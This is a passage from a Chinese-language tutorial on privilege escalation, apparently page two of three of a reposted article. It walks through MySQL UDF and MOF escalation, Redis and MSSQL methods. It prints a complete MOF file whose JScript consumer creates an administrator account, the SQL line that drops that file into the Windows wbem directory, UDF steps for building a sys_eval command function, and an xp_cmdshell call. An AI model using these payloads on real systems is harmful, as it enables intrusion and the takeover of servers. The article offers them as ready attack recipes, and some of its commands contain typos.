提权总结以及各种利用姿势
来源:岁月联盟
时间:2020-01-29
root就会变成我们的脏牛,然后登陆这个用户,就可以是管理员权限,记得一定要把脏牛备份的文件移动到原来的地方,否则管理员就会登陆不上。
0×03 数据库提权
MySQL数据库提权
1、具有MySQL的root权限,且MySQL以system权限运行。
2、具有执行SQL语句的权限。
MySQL数据库提权分为:
1、开机启动脚本
2、udf脚本
3、mof脚本
4、计划任务我们主要介绍udf脚本提权,因为我个人觉得这个数据库提权方法还是比较好用的,但是需要数据库写权限。
开机启动项提权
利用MySQL,将后门写入开机启动项。同时因为是开机自启动,再写入之后,需要重启目标服务器,才可以运行。
Linux UDF提权
不需要判断mysql是什么版本的,直接查看路径就行,直接写so文件,linux里面的文件是so文件,Windows文件是dll文件。
我们getshell之后进入终端输入whoami,发现我们只是apache用户权限
我们找一下网站数据库的配置文件,查看数据库的账号密码,可以看到账号root密码root
登陆mysql数据库,可以在MySQL里输入show variables like ‘%plugin%’; 直接查看plugin路径
然后我们把so文件利用16进制编辑工具进行编码,再解码写入目录中,返回为true,写入成功。
写入之后,执行创建函数的命令,就会创建一个sys_eval的函数,用来执行系统命令,这个函数执行的系统命令全部都是system权限的。
sys_eval这个函数就可以执行系统命令,括号里输入系统命令即可
Windows UDF提权:
UDF可以理解为MySQL的函数库,可以利用udf定义的创建函数。• 想要利用udf,必须上传udf.dll作为udf的执行库。• MySQL中支持UDF扩展,使得我们可以调用DLL里面的函数来实现一些特殊的功能。首先导出DLL文件,然后判断mysql的版本mysql版本5.2,UDF导出到安装路径MySQL/Lib/Plugin/后面的方式跟linux udf提权一样。就不演示了,方法跟Linux udf提权一样
MOF提权(只适用于windows系统,一般低版本系统才可以用,比如xp,server2003)
1、首先找一个可以写的目录,把我们的MOF文件上传上去。
2、执行以下sql语句,mof文件内的命令就会执行。
我们把mof文件上传到C:/wmpub/nullevt.mof,之后再将这个文件复制到c:/windows/sysrtem32/wbem/mof/nullevt.mof目录下
Select load file(‘C:/wmpub/nullevt.mof’)intodumpfile’c:/windows/sysrtem32/wbem/mof/nullevt.mof’
将这段代码复制到mof后缀的文件
# pragma namespace("/./root/subscription")
instance of EventFilter as $EventFilter{ EventNamespace ="Root/Cimv2"; Name = "filtP2"; Query = "Select * From InstanceModificationEvent "
"Where TargetInstance Isa /"Win32_LocalTime/" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new
ActiveXObject(/"WScript.Shell/")/nWSH.run(/"net.exe user admin admin /add")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
把这个mof文件上传到目标机中,可以修改代码,进行命令执行。目前mof提权方法用的比较少了,因为比较麻烦,建议MySQL数据库提权还是用udf比较好。
Redis提权
1、开机启动脚本
2、一般情况下,由于使用源码编译安全的,默认以root权限运行,通过未授权进入数据库,可以写任意文件,还可以用exp直接执行命令。
3、mof脚本
4、计划任务
5、ssh公钥
mssql提权
所谓利用数据库进行提权,利用的其实是数据库的运行权限,所以我们只要满足以下条件即可进行提权:1、必须获得sa的账号密码或者sa相同权限的账号密码,且mssql没有被降权。2、必须可以以某种方式执行sql语句,例如:webshell或者1433端口的连接。
mssql数据库提权思路:
1、开机启动脚本
2、监听在1433端口,拿到mssql的sa账户的账号和密码,就可以执行命令,利用exec xp_cmdshellwhoami。
上一页 [1] [2] [3] 下一页
